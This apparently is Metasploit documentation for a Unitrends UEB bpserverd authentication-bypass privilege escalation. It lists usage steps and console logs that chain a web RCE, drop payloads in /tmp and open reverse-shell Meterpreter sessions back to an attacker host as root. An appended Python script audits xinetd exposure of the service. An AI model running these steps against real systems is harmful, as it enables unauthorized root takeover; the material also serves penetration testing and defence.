## Vulnerable Application

It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system.

This is very similar to `exploits/linux/misc/ueb9_bpserverd`; however, it runs against `localhost` by dropping a Python script on the local file system. Unitrends stopped `bpserverd` from listening remotely in version 10.

## Vulnerable Application

This module has been tested successfully on:

* UEB 9.2
* UEB 10.0

## Verification Steps

1. Get a user shell using `exploit/linux/http/ueb_api_rce` with `set target 1`
2. ```use exploit/linux/local/ueb_bpserverd_privesc```
3. ```set session [SESSION]```
4. ```exploit```
5. A root meterpreter session should have been opened successfully

## Scenarios

### UEB 10.0 on CentOS 6.5

```
msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit
[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

### UEB 9.2 on CentOS 6

```
resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
resource (ueb_priv.rb)> set rhost 1.1.1.1
rhost => 1.1.1.1
resource (ueb_priv.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (ueb_priv.rb)> set target 1
target => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
[*] Command Stager progress - 126.63% done (1051/830 bytes)
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
resource (ueb_priv.rb)> set session 1
session => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
[*] Writing privesc script to '/tmp/.sDjn0m'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
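
The Vulnerable Application section notes that `bpserverd` is exposed via `xinetd` and stopped listening remotely in version 10. The audit below is an added example, not part of the Metasploit module or of Unitrends software: it classifies how an xinetd service entry is exposed, using the real xinetd attributes `disable`, `bind`/`interface` and `only_from`. The service name `bpserverd`, the sample entry and its server path are assumptions, and the `defaults` section and `includedir` files are not merged.

```python
import ipaddress
import re

# Constructed sample; the service name and server path are assumptions.
SAMPLE_EXPOSED = """\
service bpserverd
{
    disable = no
    user    = root
    server  = /placeholder/path/to/bpserverd
}
"""
SAMPLE_LOCAL = SAMPLE_EXPOSED.replace("}", "    bind    = 127.0.0.1\n}")

def parse_services(text):
    """Return {service: {attribute: [values]}} for the =, += and -= operators."""
    services, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        header = re.match(r"service\s+(\S+)$", line)
        attr = re.match(r"(\w+)\s*([+-]?=)\s*(.*)$", line)
        if header:
            current = services.setdefault(header.group(1), {})
        elif line == "}":
            current = None
        elif current is not None and attr:
            key, op, vals = attr.group(1), attr.group(2), attr.group(3).split()
            old = [] if op == "=" else current.get(key, [])
            current[key] = ([v for v in old if v not in vals] if op == "-="
                            else old + vals)
    return services

def is_loopback(value):
    """True for loopback addresses/networks; unknown hostnames count as remote."""
    try:
        return ipaddress.ip_network(value, strict=False).is_loopback
    except ValueError:
        return value == "localhost"

def audit(text, name="bpserverd"):
    """Classify a service as 'absent', 'disabled', 'loopback-only' or 'remote'."""
    svc = parse_services(text).get(name)
    if svc is None:
        return "absent"
    if svc.get("disable") == ["yes"]:
        return "disabled"
    scopes = (svc.get(k) for k in ("bind", "interface", "only_from"))
    local = any(v and all(map(is_loopback, v)) for v in scopes)
    return "loopback-only" if local else "remote"
```

A `loopback-only` result rules out remote reach only; the module documented here reaches the service from a local session on the same host.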